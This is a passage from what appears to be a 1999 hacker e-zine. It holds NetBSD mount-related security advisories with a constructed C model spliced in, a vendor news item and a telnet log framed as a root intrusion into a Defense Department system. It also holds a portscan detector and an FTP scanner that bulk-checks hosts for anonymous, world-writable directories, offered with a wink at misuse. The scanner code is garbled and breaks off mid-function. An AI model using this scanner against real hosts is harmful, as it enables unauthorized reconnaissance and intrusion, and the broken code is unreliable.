    ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990311-umapfs

NetBSD-current since 19990312 is not vulnerable. Users of NetBSD-current should upgrade to a source tree later than 19990312.

If neither of the above can be performed, a simple work around is to remove umapfs from your kernel configuration and rebuild a kernel. For this you need to remove or comment out the line:

    file-system UMAPFS # NULLFS + uid and gid remapping

in the configuration file. See these URLs for documentation on building a NetBSD kernel:

    http://www.NetBSD.ORG/Documentation/kernel/index.html#downloading_kernel_source
    http://www.NetBSD.ORG/Documentation/kernel/index.html#building_a_kernel

Thanks To
=========

Thanks go to Manuel Bouyer for the discovery and solution for this problem.

Revision History
================

1999/03/17 - initial version

More Information
================

Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.

Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.
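
Why the umapfs check has to sit in the kernel rather than in mount_umap(8), as an added C model of the advisory above (not NetBSD source and not the patch it links to). Every type, function and constant is hypothetical, and the helper's policy is an assumption, since the advisory does not say what mount_umap(8) checked.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model; names and values are hypothetical, not NetBSD's. */
#define MODEL_OK    0
#define MODEL_EPERM 1                   /* stand-in for EPERM */

struct idmap { unsigned from, to; };    /* one line of the uid mapping file */

struct mount_req {
    unsigned caller_uid;                /* who asked for the mount */
    const char *fstype;                 /* "umap", "null", ... */
    int can_read_target;                /* caller can read the source tree */
    unsigned mountpoint_owner;          /* owner of the directory mounted on */
    const struct idmap *map;            /* caller-supplied mapping table */
    size_t nmap;
};

/* The "usual checks" the advisory lists: root, or read access to the
 * target and ownership of the mount point. */
static int usual_mount_checks(const struct mount_req *r)
{
    if (r->caller_uid == 0)
        return MODEL_OK;
    if (r->can_read_target && r->mountpoint_owner == r->caller_uid)
        return MODEL_OK;
    return MODEL_EPERM;
}

/* ASSUMED user-space policy: a non-root caller may not map anything to
 * uid 0. It runs in the caller's own process, so the caller can skip it. */
int helper_policy_check(const struct mount_req *r)
{
    size_t i;

    if (r->caller_uid == 0)
        return MODEL_OK;
    for (i = 0; i < r->nmap; i++)
        if (r->map[i].to == 0)
            return MODEL_EPERM;
    return MODEL_OK;
}

/* Before the fix: nothing umapfs-specific is enforced kernel-side, so the
 * mapping table is trusted as supplied. */
int kernel_mount_prepatch(const struct mount_req *r)
{
    return usual_mount_checks(r);
}

/* After the fix as the advisory describes it: umapfs mounts are root-only,
 * decided on the privileged side of the boundary. */
int kernel_mount_patched(const struct mount_req *r)
{
    if (strcmp(r->fstype, "umap") == 0 && r->caller_uid != 0)
        return MODEL_EPERM;
    return usual_mount_checks(r);
}

/* The path taken by the stock helper: its own check, then the kernel. */
int mount_via_helper(const struct mount_req *r,
                     int (*kernel_entry)(const struct mount_req *))
{
    int rc = helper_policy_check(r);
    return rc != MODEL_OK ? rc : kernel_entry(r);
}

/* uid the lower layer sees for `uid` under the request's table. Unlisted
 * ids are left unchanged here, which is a simplification of this model. */
unsigned mapped_uid(const struct mount_req *r, unsigned uid)
{
    size_t i;

    for (i = 0; i < r->nmap; i++)
        if (r->map[i].from == uid)
            return r->map[i].to;
    return uid;
}

/* Constructed sample: uid 1000 owns the mount point and maps itself to 0. */
static const struct idmap sample_map[] = { { 1000, 0 } };

struct mount_req sample_user_request(void)
{
    struct mount_req r = { 1000, "umap", 1, 1000, sample_map, 1 };
    return r;
}

struct mount_req sample_root_request(void)
{
    struct mount_req r = sample_user_request();
    r.caller_uid = 0;
    r.mountpoint_owner = 0;
    return r;
}

int main(void)
{
    struct mount_req u = sample_user_request();

    printf("stock helper, pre-patch kernel : %s\n",
           mount_via_helper(&u, kernel_mount_prepatch) ? "refused" : "mounted");
    printf("helper skipped, pre-patch      : %s (uid 1000 -> %u)\n",
           kernel_mount_prepatch(&u) ? "refused" : "mounted",
           mapped_uid(&u, 1000));
    printf("helper skipped, patched kernel : %s\n",
           kernel_mount_patched(&u) ? "refused" : "mounted");
    return 0;
}
```

The helper's refusal only holds for callers who choose to run the stock helper; the patched kernel entry point refuses the same request regardless of which binary issued it.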

$NetBSD: NetBSD-SA1999-006.txt,v 1.5 1999/03/17 12:15:13 mrg Exp $

@HWA


21.1 NetBSD noexec mount flag advisory
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NetBSD Security Advisory 1999-007
=================================

Topic:    noexec mount flag is not properly handled by non-root mount
Version:  NetBSD 1.3.3 and prior; NetBSD-current until 19990318
Severity: Local users can execute binaries they're not allowed to

Abstract
========

On a system where all partitions writable by regular users are mounted with the `noexec' option, a regular user should not be able to execute a binary which was not put on the system by the administrator. Insufficient checks in the mount system call may allow a regular user to mount a device, remote host or local directory without the `noexec' option, allowing them to execute arbitrary binaries.

Technical Details
=================

The mount syscall does not require root privileges, it only requires that the user has read access to the target and is owner of the mount point. For such mounts, the `nosuid' and `nodev' flags, which disable set-id executables and device special files respectively, are automatically handled by the mount system call, but not the `noexec' flag, which disables the ability to execute binaries on this partition.

This allows a regular user to perform a mount on a mount point he owns, and then execute binaries from this mount point, even if the mount point was initially in a sub-tree of the global filesystem mounted with the `noexec' option. The easiest way to bypass a `noexec' restriction is to use a nullfs mount, but a NFS mount, or a mount from a readable block device can allow it as well.

Solutions and Workarounds
=========================

A patch is available for the NetBSD 1.3.3 which makes the mount system call inherit the `noexec' flag from the mount point.
You may find this patch on the NetBSD ftp server:

    ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990317-mount

NetBSD-current since 19990318 is not vulnerable. Users of NetBSD-current should upgrade to a source tree later than 19990318.

Thanks To
=========

Manuel Bouyer for the solution.

Revision History
================

1999/03/17 - initial version

More Information
================

Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.

Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.

$NetBSD: NetBSD-SA1999-007.txt,v 1.1 1999/03/18 07:35:55 mrg Exp $

@HWA


22.0 Checkpoint releases new DHCP based user 'mapping' technology to track users
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN list

Forwarded
From: Will Spencer

Check Point Launches Address Mapping Technology

Check Point Software Technologies Ltd. introduced mapping technology yesterday that automatically matches an end user's identity to a dynamically assigned IP address.

Check Point says its User to Address Mapping technology will help IT managers track network use and enforce access policies in Dynamic Host Control Protocol, where IP addresses change often.

A byproduct of Check Point's 1998 merger with MetaInfo, the technology is available as part of Check Point's Meta IP software for IP address management. User to Address Mapping is also integrated with Check Point's Firewall 1 and VPN 1 products.

When IT managers use this technology in conjunction with their firewalls, they can control access: assign granular network privileges, track excessive Internet usage, and trace unauthorized IP addresses that cause conflicts that interrupt network service.

User to Address Mapping transparently maps four components -- a user's logon name, logon time, IP address, and Media Access Control address -- to a dynamically assigned IP address.

An Enterprise Edition of the Meta IP 4.1 product starts at $9,995 for a 1,000-node network. A version for smaller networks starts at $445 for a 100-node license.

-- Amy K. Larsen

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA


23.0 SPAWAR a Navy Infosec site ... go FISH
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Web Site:

US DEPARTMENT OF DEFENSE WARNING STATEMENT

This is a Department of Defense computer system. This computer system, including all related equipment, networks and network devices (specifically including Internet access), are provided only for authorized U. S. Government use.
DoD computer systems may be monitored for all lawful purposes, including to ensure that their use is authorized, for management of the system, to facilitate protection against unauthorized access, and to verify security procedures, survivability and operational security. Monitoring includes active attacks by authorized DoD entities to test or verify the security of this system. During monitoring, information may be examined, recorded, copied and used for authorized purposes. All information, including personal information, placed on or sent over this system may be monitored.

Use of this DoD computer system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use may subject you to criminal prosecution. Evidence of unauthorized use collected during monitoring may be used for administrative, criminal or adverse action. Use of this system constitutes consent to monitoring for these purposes.

PRIVACY AND SECURITY NOTICE

This Navy Web Information Service is provided as an official service by the Space and Naval Warfare Systems Command.

For site security and management purposes, all transactions with this server are collected for security and statistical purposes. This government computer system uses software programs to create summary statistics, which are used for determining technical design specifications, traffic load, and to identify system performance or problem areas.

For site security purposes and to ensure that this service remains available to all users, this government computer system employs software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage.

Except for authorized law enforcement investigations, no other attempts are made to identify individual users or their usage habits.
Raw data logs are used for no other purposes and are scheduled for regular destruction in accordance with National Archives and Records Administration General Schedule 20. Unauthorized attempts to upload information or change information on this service are strictly prohibited and may be punishable under the Computer Fraud and Abuse Act of 1986 and the National Information Infrastructure Protection Act. If you have any questions or comments about the information presented here, please forward them to the Internet Operations Manager or 1.800.304.4636.

DISCLAIMER

Areas of this Server link to other Web Information Systems providing security-related information which are operated by other government organizations, commercial firms, educational institutions, and private parties. We have no control over the Information on those systems which may be objectionable or which may not otherwise conform to Department of Navy policies. Unless otherwise noted, some of the Sites listed within the pages of this server are provided by organizations outside the Navy Domain. These links are offered as a convenience and for informational purposes only. Their inclusion here does not constitute an endorsement or an approval by the Department of the Navy of any of the products, services, or opinions of the external providers. The Department of the Navy bears no responsibility for the accuracy or the content of external sites.

Telnet: (real system, simulated intrusion)

$telnet x.x.x.x
Trying x.x.x.x...
Connected to x.x.x.
Escape character is '^]'.

UNIX(r) System V Release 4.0 (droid)

----------------------------------------------------------------------------
| USE OF THIS OR ANY OTHER DEPT. OF DEFENSE INTEREST COMPUTER SYSTEM        |
| (DODICS) CONSTITUTES AN EXPRESS CONSENT TO MONITORING AT ALL TIMES.       |
| This DODICS and all related equipment are to be used for the communication,|
| transmission, processing, and storage of official U.S. Government or other |
| authorized information only. All DODICS are subject to monitoring at all  |
| times. If monitoring of any DODICS reveals possible violation of criminal |
| statutes, all relevant information may be provided to law enforcement     |
| officials.                                                                |
----------------------------------------------------------------------------

login: root
Password:
login incorrect
login: root
Password:
Last login: Wed Mar 31 15:50:07 from hactivism.net
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

(droid) #1: Thu Dec 24 17:14:45 EST 1998

Updated with: ISS 2.03 October 1998
BEWARE.
stty: No match.
% ps -aux
USER     PID %CPU %MEM  VSZ  RSS TT  STAT STARTED       TIME COMMAND
sas      549 95.5  1.3 1156  836 p0- R    Thu04PM 8644:39.03 /usr/local/bin/
sas    13683  2.4  0.5  468  336 p0  Ss    8:15PM    0:00.59 -csh (csh)
root   13682  1.2  1.0  844  596 ??  Ss    8:15PM    0:00.35 telnetd
root       3  0.0  0.0    0    0 ??  DL   Thu09AM    0:00.00 (vmdaemon)
root       4  0.0  0.0    0    0 ??  DL   Thu09AM   13:06.06 (syncer)
root      29  0.0  0.2  204   88 ??  Is   Thu09AM    0:00.01 adjkerntz -i
root      89  0.0  0.8  788  496 ??  Ss   Thu02PM    0:41.67 syslogd
daemon   101  0.0  0.7  760  464 ??  Is   Thu02PM    0:00.33 portmap
root     125  0.0  0.8  820  500 ??  Ss   Thu02PM    0:20.93 inetd
root     128  0.0  0.8  936  492 ??  Ss   Thu02PM    0:43.73 cron
root     178  0.0  1.2 1156  768 ??  Ss   Thu02PM    0:08.37 sendmail: accep
root     315  0.0  1.7 1276 1044 v0  Is+  Thu02PM    0:07.11 -tcsh (tcsh)
root     317  0.0  0.8  780  476 v2  Is+  Thu02PM    0:00.14 /usr/libexec/ge
root     318  0.0  0.8  780  476 v3  Is+  Thu02PM    0:00.13 /usr/libexec/ge
root     319  0.0  0.7  776  420 ??  I    Thu02PM    0:00.11 /usr/libexec/ge
root     320  0.0  0.7  776  420 ??  I    Thu02PM    0:00.11 /usr/libexec/ge
root     371  0.0  1.2 1036  744 ??  Is   Thu02PM    0:55.74 SCREEN (screen-
root    1959  0.0  1.6 1400  972 ??  Ss   Fri10AM    3:13.06 httpd
root    1965  0.0  1.3 1072  824 ??  Ss   Fri10AM    1:41.84 /usr/local/etc/
root    1966  0.0  1.2 1004  732 ??  IN   Fri10AM    0:01.79 /usr/local/etc/
root   12504  0.0  0.8  780  516 v1  Is+  11:45PM    0:00.14 /usr/libexec/ge
nobody 13143  0.0  1.9 1456 1188 ??  I     9:43AM    0:00.97 httpd
nobody 13153  0.0  1.9 1456 1204 ??  I     9:55AM    0:00.82 httpd
nobody 13228  0.0  1.9 1468 1212 ??  I    11:38AM    0:00.66 httpd
nobody 13529  0.0  1.9 1456 1204 ??  I     4:57PM    0:00.23 httpd
root   13576  0.0  1.3 1072  784 ??  I     5:54PM    0:00.02 /usr/local/etc/
root   13645  0.0  1.3 1072  832 ??  I     7:25PM    0:00.02 /usr/local/etc/
root       0  0.0  0.0    0    0 ??  DLs  Thu09AM    0:04.13 (swapper)
root       1  0.0  0.4  416  248 ??  Is   Thu09AM    0:02.43 /sbin/init --
root       2  0.0  0.0    0    0 ??  DL   Thu09AM    0:09.21 (pagedaemon)
% ls -laF /ftp
total 6
drwxr-xr-x   6 root  wheel   512 Mar 11 14:15 ./
drwxr-xr-x  14 root  wheel  1024 Jan 26 12:28 ../
drwxr-xr-x   2 root  wheel   512 Mar  1 15:57 pub/
drwxr-xr-x   3 root  wheel   512 Mar 12 12:04 pvt/
drwxrwxrwx  35 root  wheel  1024 Mar 31 06:54 secure/
drwxrwxrwx   2 root  wheel   512 Mar 11 14:15 warez/
% cd /www
% logout
Connection closed by foreign host.
$

By the way, a site that is good to look around with lots of legit info is www.nic.mil and ftp.nic.mil .... network topology to phone numbers for NIPR/SIPRENET can be found on that system.

Anyway the point of all this is that on this navy site it's a good idea to {ahem} go FISH. Yeah that's right, http://infosec.nosc.mil/FISH/ has a lot of good information. btw FISH stands for Fleet Internet Security Handbook. Cute huh? heh. go FISH

@HWA

24.0 Portscan detector
     ~~~~~~~~~~~~~~~~~

/*
 * Scandetd is a daemon which tries to recognize port scanning.
 * If it happens, the daemon sends e-mail to the specified address
 * (by default root@localhost) with the following information:
 *
 *   time
 *   host
 *   how many connections were made
 *   port of first connection and port of last connection
 *
 * compile: gcc scandetd.c -o scandetd
 *
 * author: Michal Suszycki mike@wizard.ae.krakow.pl
 *
 * You can change a few defines and variables below this comment to tune
 * scandetd to your needs.
 *
 * If you have some problems with compiling try to
 * change 2 lines:
 *   #include to #include
 *   #include to #include
 *
 * This code was based on IpLogger Package by Mike Edulla (medulla@infosoc.com)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 1, or (at your option)
 * any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 */

/* headers required by the code below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/param.h>
//#include <syslog.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

/* how many hosts should I remember. If your server is heavily loaded
   it's a good idea to increase this number a little bit */
#define HOW_MANY 6

/* how many connections should I recognize as scanning? */
#define SCAN 25

/* uncomment this if you want to ignore 'scanning' which starts and ends
   on port 80. It happens that some host makes a lot of fast connections
   only on port 80. Of course we don't want to log it. */
#define NOWWW

/* If the next connection arrived right after the previous one we have to
   count it. Default time is 1 second. */
#define SEC 1

/* We use this port for sending mail */
#define MAIL_PORT 25

/* we send mail to : */
char *mail_to = "";

/* IP of the machine which sends our mail */
char *mail_host = "";

/* mail will be sent from host: */
char *from_host = "localhost";

/* ----------- end of user's configuration ---------------- */

#ifndef NOFILE
#define NOFILE 1024
#endif

/* dotted-quad string for an address in network byte order */
char *hostlookup(int i)
{
    static char buff[128];
    struct in_addr p;

    p.s_addr = i;
    strncpy(buff, inet_ntoa(p), sizeof buff);
    return buff;
}

char *servlookup(unsigned short port)
{
    struct servent *se;
    static char buff[1024];

    se = getservbyport(port, "tcp");
    if (se == NULL)
        sprintf(buff, "port %d", ntohs(port));
    else
        sprintf(buff, "%s", se->s_name);
    return buff;
}

/* one packet as read from the raw socket; assumes an IP header
   without options directly followed by the TCP header */
struct ippkt {
    struct iphdr ip;
    struct tcphdr tcp;
} pkt;

/* per-source state; ports are kept in network byte order */
struct host {
    unsigned int from;
    time_t t;
    unsigned short low_port;
    unsigned short hi_port;
    int count;
} hosts[HOW_MANY];

void demonize()
{
    int fd, f;

    if (getppid() != 1) {
        signal(SIGTTOU, SIG_IGN);
        signal(SIGTTIN, SIG_IGN);
        signal(SIGTSTP, SIG_IGN);
        f = fork();
        if (f < 0)
            exit(-1);
        if (f > 0)
            exit(0);
        /* child process */
        setpgrp();
        for (fd = 0; fd < NOFILE; fd++)
            close(fd);
        chdir("/");
        umask(0);
        return;
    }
}

void init()
{
    int i;
    time_t now;

    now = time(NULL);
    for (i = 0; i < HOW_MANY; i++)
        hosts[i].t = now;
}

/* find the slot for addr; *p is 1 if the host is already tracked,
   otherwise 0 and the oldest slot is returned for reuse */
int allocate(int *p, unsigned int addr)
{
    int i, v = 0;
    time_t tmp = hosts[0].t;

    for (i = 0; i < HOW_MANY; i++) {
        if (hosts[i].t <= tmp) {
            tmp = hosts[i].t;
            v = i;
        }
        if (hosts[i].from == addr) {
            *p = 1;
            return i;
        }
    }
    *p = 0;
    return v;
}

void show(int a)
{
    int i;

    for (i = 0; i < HOW_MANY; i++) {
        printf("Host %s, time %ld, count=%d, l=%d,",
               hostlookup(hosts[i].from), (long) hosts[i].t,
               hosts[i].count, ntohs(hosts[i].low_port));
        printf("hi = %d\n", ntohs(hosts[i].hi_port));
    }
    exit(0);
}

void no_zombie(int i)
{
    wait(NULL);
}

/* forks: the child returns to the packet loop, the parent delivers
   the report over SMTP and exits */
int send_mail(struct host *bad)
{
    static struct sockaddr_in sa;
    int s, i, low, high;
    char buf[1024], combuf[256];
    char *comm[] = {
        "HELO ", from_host,
        "MAIL FROM: SCANDETD@", from_host,
        "RCPT TO:", mail_to,
        "DATA", " "
    };

    i = fork();
    if (!i)
        return 0;
    if (i < 0)
        return -1;

    low = ntohs(bad->low_port);
    high = ntohs(bad->hi_port);
    sprintf(buf, "%sPossible port scanning from %s,\n"
            "I counted %d connections.\nFirst connection was made on %d port and the last one on %d port.\r\n.\r\n",
            ctime(&bad->t), hostlookup(bad->from), bad->count, low, high);

    sa.sin_port = htons(MAIL_PORT);
    sa.sin_family = AF_INET;
    if ((sa.sin_addr.s_addr = inet_addr(mail_host)) == INADDR_NONE)
        exit(-1);
    bzero(&sa.sin_zero, 8);
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        exit(-1);
    if (connect(s, (struct sockaddr *) &sa, sizeof(struct sockaddr)) < 0)
        exit(-1);

    for (i = 0; i < 8; i += 2) {
        sprintf(combuf, "%s%s\n", comm[i], comm[i + 1]);
        if (write(s, combuf, strlen(combuf)) < 0) {
            close(s);
            exit(-1);
        }
        sleep(1);
    }
    if (write(s, buf, strlen(buf)) < 0)
        exit(-1);
    sleep(1);
    if (write(s, "QUIT\n", 5) < 0)
        exit(-1);
    close(s);
    exit(0);
}

int main(int argc, char **argv)
{
    int s, index, was;
    time_t now;

    demonize();
    init();
    /* raw TCP socket (protocol 6); requires root */
    s = socket(AF_INET, SOCK_RAW, 6);
//  openlog("scand", 0, LOG_LOCAL2);
//  syslog(LOG_NOTICE,"scand started and ready");
//  signal(SIGINT,show);

    /* to avoid zombies */
    signal(SIGCHLD, no_zombie);

    while (1) {
        read(s, (struct ippkt *) &pkt, sizeof(pkt));
        now = time(NULL);
        /* only the first packet of a connection attempt: SYN without ACK */
        if (pkt.tcp.syn == 1 && pkt.tcp.ack == 0) {
            index = allocate(&was, pkt.ip.saddr);
            if (!was) {
                /* the slot is being reused: report its previous owner
                   if it had reached the scan threshold */
                if (hosts[index].count >= SCAN
#ifdef NOWWW
                    /* ports are stored in network order; the original
                       compared against 20480, which is htons(80) on
                       little-endian machines only */
                    && hosts[index].low_port != htons(80)
                    && hosts[index].hi_port != htons(80)
#endif
                    )
                    send_mail(&hosts[index]);
                hosts[index].from = pkt.ip.saddr;
                hosts[index].low_port = pkt.tcp.dest;
                hosts[index].hi_port = pkt.tcp.dest;
                hosts[index].count = 1;
                hosts[index].t = now;
                continue;
            }
            /* if this connection was right after previous we must count it */
            else if (now - SEC <= hosts[index].t) {
                hosts[index].count++;
                hosts[index].hi_port = pkt.tcp.dest;
            }
            hosts[index].t = now;
        }
    }
}

@HWA

25.0 FTP Vulnerability scanner
     ~~~~~~~~~~~~~~~~~~~~~~~~~

Here is a ftp vulnerability scanner:

-----[ cut here, ftpscan.c ]-----
/*
 * ftpscan 1.o
- by vENOMOUS of rdC - Mar 29, 1999 * * This will open a specific file [-f file], get the IPs from it, * then, check if FTP port [ -p 21 ] is open and log the version. * If you specify the [ -o ] flag it will try log into the FTP * and execute LIST command [recursive], this is usefull * for see if there are any world writeable directories. * * You should know what you can do with that. * * credits: localip (lip) routine has been taken from queSO. * * Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo * #rdC - ub * */ #include #include #include #include #include #include #include #include #include #include #include #include "blah.h" /* taken from queSO */ char rdcopenfile(char g0d[257]); void usage(char *damn); void RDCconnect2(char host[1000], int puerto); int bindit(int socket_type, u_short port, int *listener); void sigh(int z); u_long lip(void); /* QueSO */ FILE *file; FILE *fileout; char ipsfile[256], bleh[100000][200], homer[256], beer[256], huhense[32]; u_long localip; int sockfd, leen2=0, listing=0, sockfd1, ip1=0, ip2=0, ip3=0, ip4=0, lsock=-1, port2=-1, lala=0, dfinder=0, gotit=0, xx=0; int main(int argc, char **argv) { char arg; int p0rt=21; if ( argc < 3 ) { usage(argv[0]); } while ((arg = getopt(argc, argv, "f:p:o")) != EOF) { switch(arg) { case 'f': strncpy(ipsfile,optarg,128); break; case 'p': p0rt = atoi (optarg); break; case 'o': listing = 1; break; default: usage(argv[0]); break; } } while (dfinder < 5) { char disp[500]; sprintf(disp,"ppp%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } dfinder=0; if (gotit == 1) dfinder=6; while (dfinder < 5) { char disp[500]; sprintf(disp,"eth%d",dfinder); strcpy(huhense,disp); localip = lip(); sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4); if ((ip3 && ip4) != 0) { gotit=1; break; } dfinder++; } if (gotit == 0) { 
fprintf(stdout,"\nCannot define local ip address, aborting!\n\n"); fflush(stdout); exit(1); } fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip)); fflush(stdout); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala); strlen(beer); rdcopenfile(ipsfile); for (xx = 0 ; xx < leen2 ; xx++) { RDCconnect2(bleh[xx], p0rt); lala++; } } char rdcopenfile(char g0d[257]) { int x; /* see if the file can be read... */ if ((file=fopen(g0d,"r")) == NULL) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nCannot open file %s for reading\n\n", g0d); exit(1); } /* get the all the lines */ for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++); fclose(file); } void RDCconnect2(char host[1000], int puerto) { char versi0n[5000]; int nmb; struct sockaddr_in beb; struct hostent *d0h; // struct timeval timev; beb.sin_family = AF_INET; beb.sin_port = htons(puerto); d0h = gethostbyname(host); if (!d0h) { if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) { printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n"); printf("\nPut a correct address\n\n"); exit(0); } } else { bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length); } strcpy(homer,"unable to connect: Connection refused"); sockfd = socket(AF_INET, SOCK_STREAM,0); fprintf(stdout,"\n------------------------------------------------------------------------------n"); fprintf(stdout,"IP: %s", host); fflush(stdout); signal(SIGALRM, sigh); alarm(10); if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0) { fprintf(stdout,"%s\n\n",homer); fflush(stdout); return; } alarm(0); bzero(versi0n, sizeof(versi0n)); if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1) { fprintf(stdout,"Connection reset by peer?\n\n"); fflush(stdout); } if (strlen(versi0n) == 0) { close(sockfd); return; } if (strstr(versi0n,"Microsoft") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); 
close(sockfd); return; } if (strstr(versi0n,"WinSock") != NULL) { fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"NetWare") != NULL) { fprintf(stdout,"Skipping host cuz its runing NetWare\n\n"); fflush(stdout); close(sockfd); return; } if (strstr(versi0n,"Proxy Server") != NULL) { fprintf(stdout,"Runing ProxyServer, skipping host\n\n"); fflush(stdout); close(sockfd); return; } fprintf(stdout,"FTP banner:\n"); fprintf(stdout,"%s\n",versi0n); fflush(stdout); if (listing == 1) { char username[70], sendear[17200], listit[100]; int n; /* login in */ strcpy(username,"anonymous"); sprintf(sendear,"USER %s\n",username); fprintf(stdout,"Login as: %s\n",username); write(sockfd,sendear,strlen(sendear)); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"denied") != NULL) { fprintf(stdout,"Anonymous access denied, skipping\n\n"); close(sockfd); return; } if (strstr(sendear,"USER anonymous") != NULL) { fprintf(stdout,"Remote host has closed the connection.\n\n"); close(sockfd); return; } if (strstr(sendear,"unknown") != NULL) { fprintf(stdout,"Anonymous access unknown\n\n"); close(sockfd); return; } if (strstr(sendear,"not found") != NULL) { fprintf(stdout,"User anonymous not found\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Using password: bleh@\n"); write(sockfd,"PASS bleh@\n",11); read(sockfd,sendear,sizeof(sendear)); if (strstr(sendear,"Can't set") != NULL) { fprintf(stdout,"Cant set guest privileges\n\n"); close(sockfd); return; } fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); fprintf(stdout,"Setting PORT to %d\n",17886+lala); bzero(beer,sizeof(beer)); sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala); write(sockfd,beer,strlen(beer) + 4); read(sockfd,beer,sizeof(beer)); /* bind the port for data transfer */ sockfd1 = bindit(SOCK_STREAM, port2, &lsock); 
read(sockfd,sendear,sizeof(sendear)); fprintf(stdout,"Using LIST command\n"); fprintf(stdout,"Answer: %s\n",sendear); bzero(sendear, sizeof(sendear)); read(sockfd1,sendear,sizeof(sendear)); fprintf(stdout,"Recursive list:\n %s\n",sendear); bzero(sendear, sizeof(sendear)); fflush(stdout); // lala++; } close(sockfd); close(sockfd1); } int bindit(int socket_type, u_short port, int *listener) { struct sockaddr_in address; int listening_socket; int connected_socket = -1; int reuse_addr = 1; char sendear[17200]; port = htons(17886+lala); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = port; address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, socket_type, 0); if (listening_socket < 0) { fprintf(stdout,"Cant recive list.\n\n"); fflush(stdout); return; } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr)); if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) { fprintf(stdout,"Error\n\n"); fflush(stdout); close(listening_socket); exit(1); } listen(listening_socket, 1); signal(SIGALRM, sigh); alarm(10); while(connected_socket < 0) { connected_socket = accept(listening_socket, NULL, NULL); } } void sigh(int z) { alarm(0); signal(SIGALRM, SIG_DFL); strcpy(homer,"Unable to connect: timeout"); } u_long lip (void) { int pvto, yesto, traversal; struct sockaddr_in *dim0n; struct ifreq *i; struct ifconf ic; char bufercito[512]; pvto = socket (AF_INET, SOCK_STREAM, 0); ic.ifc_pum = 512; ic.ifc_buf = bufercito; ioctl (pvto, SIOCGIFCONF, (char *) &ic); i = ic.ifc_req; yesto = (ic.ifc_pum / sizeof(struct ifreq)); for (traversal = 0; traversal < yesto; traversal++) { ioctl(pvto, SIOCGIFADDR, (char *) &i); dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr; if (!strcmp (i->ifr_name, huhense)) return dim0n->sin_addr.s_addr; i++; } } void usage(char *damn) { printf("\n<[( ftpscan 1.o by vENOMOUS of rdC 
